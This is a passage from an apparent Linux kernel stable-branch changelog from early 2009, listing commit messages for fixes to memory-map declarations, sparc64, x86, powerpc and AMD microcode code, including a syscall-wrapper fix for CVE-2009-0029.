which triggers the problem. This patch: Declaration of early_pfn_to_nid() is scattered over per-arch include files, and it seems it's complicated to know when the declaration is used. I think it makes fix-for-memmap-init not easy. This patch moves all declaration to include/linux/mm.h After this, if !CONFIG_NODES_POPULATES_NODE_MAP && !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID -> Use static definition in include/linux/mm.h else if !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID -> Use generic definition in mm/page_alloc.c else -> per-arch back end function will be called. Signed-off-by: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com> Tested-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com> Reported-by: David Miller <davem@davemlloft.net> Cc: Mel Gorman <mel@csn.ul.ie> Cc: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16sparc64: Fix DAX handling via userspace access from kernel.David S. Miller
[ Upstream commit fcd26f7ae2ea5889134e8b3d60a42ce8b993c95f ] If we do a userspace access from kernel mode, and get a data access exception, we need to check the exception table just like a normal fault does. The spitfire DAX handler was doing this, but such logic was missing from the sun4v DAX code. Reported-by: Dennis Gilmore <dgilmore@redhat.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16sparc64: Fix crashes in jbusmc_print_dimm()David S. Miller
[ Upstream commit 1b0e235cc9bfae4bc0f5cd0cba929206fb0f6a64 ] Return was missing for the case where there is no dimm info match. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-20x86, vm86: fix preemption bugThomas Gleixner
commit be716615fe596ee117292dc615e95f707fb67fd1 upstream. Commit 3d2a71a596bd9c761c8487a2178e95f8a61da083 ("x86, traps: converge do_debug handlers") changed the preemption disable logic of do_debug() so vm86_handle_trap() is called with preemption disabled resulting in: BUG: sleeping function called from invalid context at include/linux/kernel.h:155 in_atomic(): 1, irqs_disabled(): 0, pid: 3005, name: dosemu.bin Pid: 3005, comm: dosemu.bin Tainted: G W 2.6.29-rc1 #51 Call Trace: [<c050d669>] copy_to_user+0x33/0x108 [<c04181f4>] save_v86_state+0x65/0x149 [<c0418531>] handle_vm86_trap+0x20/0x8f [<c064e345>] do_debug+0x15b/0x1a4 [<c064df1f>] debug_stack_correct+0x27/0x2c [<c040365b>] sysenter_do_call+0x12/0x2f BUG: scheduling while atomic: dosemu.bin/3005/0x10000001 Restore the original calling convention and reenable preemption before calling handle_vm86_trap(). Reported-by: Michal Suchanek <hramrach@centrum.cz> Signed-off-by: Thomas Gleixner <tglx@linutronix.de> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-20x86/cpa: make sure cpa is safe to call in lazy mmu modeJeremy Fitzhardinge
commit 4f06b0436b2ddbd3b67b10e77098a6862787b3eb upstream. Impact: fix race leading to crash under KVM and Xen The CPA code may be called while we're in lazy mmu update mode - for example, when using DEBUG_PAGE_ALLOC and doing a slab allocation in an interrupt handler which interrupted a lazy mmu update. In this case, the in-memory pagetable state may be out of date due to pending queued updates. We need to flush any pending updates before inspecting the page table. Similarly, we must explicitly flush any modifications CPA may have made (which comes down to flushing queued operations when flushing the TLB). Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Acked-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-20powerpc/vsx: Fix VSX alignment handler for regs 32-63Michael Neuling
commit 26456dcfb8d8e43b1b64b2a14710694cf7a72f05 upstream. Fix the VSX alignment handler for VSX registers > 32. 32-63 are stored in the VMX part of the thread_struct not the FPR part. Signed-off-by: Michael Neuling <mikey@neuling.org> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-17x86: microcode_amd: fix wrong handling of equivalent CPU idAndreas Herrmann
commit 3c763fd77e66e55d029052da31df0abd9920cb1e upstream. Impact: fix bug resulting in non-loaded AMD microcode mc_header->processor_rev_id is a 2 byte value. Similar is true for equiv_cpu in an equiv_cpu_entry -- only 2 bytes are of interest. Signed-off-by: Andreas Herrmann <andreas.herrmann3@amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-17sparc64: Annotate sparc64 specific syscalls with SYSCALL_DEFINEx()David S. Miller
[ Upstream commit e42650196df34789c825fa83f8bb37a5d5e52c14 ] Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-17sparc: Enable syscall wrappers for 64-bit (CVE-2009-0029)Christian Borntraeger
[ Upstream commit 67605d6812691bbd2158d2f60259e0407611bc1b ] sparc64 needs sign-extended function parameters. We have to enable the system call wrappers. Signed-off-by: Christian Borntraeger <borntraeger@de.ibm.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>